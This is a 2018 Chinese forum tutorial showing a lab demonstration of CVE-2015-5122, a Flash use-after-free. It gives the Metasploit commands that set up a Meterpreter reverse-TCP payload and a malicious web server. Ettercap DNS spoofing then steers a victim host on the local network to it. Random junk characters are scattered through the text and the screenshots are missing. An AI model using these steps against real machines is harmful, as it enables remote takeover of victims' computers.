cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

/ N& N/ S4 j5 j, ^2 T# Y7 m 二、cve2015-5122漏洞实例演示虚拟机 , ^- _. X+ D j3 u

: R. l4 q0 o$ ]5 z 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： $ o* @( Y# y7 T; w& g" u/ M2 ~

; X& ^: d, J5 D search cve-2015-5122如图： 2 ?( {# }9 Y! K" G; D' y

6 ^, Z& g; i# ?* }* Q " B, f! h" n: A0 \# g- j

7 u) N) ^( ^8 c9 k 下面我们敲如下命令： ; h' \$ K Z7 I. s& @4 E# z' O

4 ~% b$ Y) K2 C1 t$ C use exploit/multi/browser/adobe_flash_opaque_background_uaf 1 U2 d' ~ D" |

7 ]; r2 q9 d! C% J6 _4 k" B set PAYLOAD windows/meterpreter/reverse_tcp 0 a- p6 I& V( `! Q

% l) Y2 g1 E5 {8 p3 ? set LHOST 192.168.0.109 5 ^7 \. { z! Y. Q& Z, L

, }( ]0 ?6 \; N9 q5 m set URIPATH / /*根目录*/ 8 Q, Z8 ^( ?1 @* P2 K

3 U2 A5 `+ c% z4 L0 I7 v set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 3 I2 [1 z8 ^' @

) D+ ~$ @7 {+ L9 C* J set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 5 y6 r# t. i* S0 O

: x9 j: L$ Y; r 然后show options如图： / X. V! X7 V( G4 v

: B1 M( x/ H+ _ y p5 x/ C / h: B7 g4 D$ @% G! ]3 M

$ N* Q: o6 o j( {) U 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
& Y- D* e7 l- S8 _ 1 X9 H1 Q' i1 V3 e' H

, N7 D: O# m2 Z& R& N, O7 F 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 7 g8 n' Z9 o6 L2 J$ ^( `

# G5 Z) J4 _( P! a9 i t Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 9 T4 R: V9 m! ^- N+ u

% _& P# J' {5 D6 `9 R3 s / |4 ]: N6 q3 c) f2 n: f6 v# G3 t

$ z# S. q( i5 I! p* x 成功了，这时候我们断开ettercap，如图： ( k, s6 e. H. H

3 s: x' x; m- S. M* c4 B( h+ D # c* A! W, Q# _& r0 ~$ f( @

. x% y! h6 n- f+ g) i Screenshot如图： . e# C; e* ^# i& E# G5 ~

* J: m+ ?" ]6 M4 N5 W9 _# P" X+ }5 _ # B5 n" C2 p3 o9 Y# J% m1 n; W

; x0 |" Z& ~0 ~ 7 Q0 o _+ R- z9 \- ~

		自动登录	找回密码
密码			立即注册

cve2015-5122漏洞实例演示虚拟机

浏览过的版块